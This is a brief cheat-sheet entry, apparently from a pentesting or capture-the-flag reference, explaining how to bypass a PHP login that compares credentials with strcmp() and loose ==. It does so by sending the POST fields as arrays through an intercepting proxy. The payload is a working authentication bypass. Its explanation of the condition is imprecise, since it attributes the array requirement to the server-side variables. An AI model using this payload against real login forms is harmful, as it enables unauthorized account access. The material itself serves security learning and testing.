# PHP strcmp() bypass

Given a `strcmp()` of a variable and a POST parameter value that looks like this
```php
[...]
if (strcmp($username, $_POST['username']) == 0) {
    if (strcmp($password, $_POST['password']) == 0) {   
[...]
```

If `$username` and `$password` are an array, sending a POST value as an array too will evaluate both `strcmp()` to 0.
Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from
```http
username=admin&password=admin
```

to
```http
username[]=admin&password[]=admin
```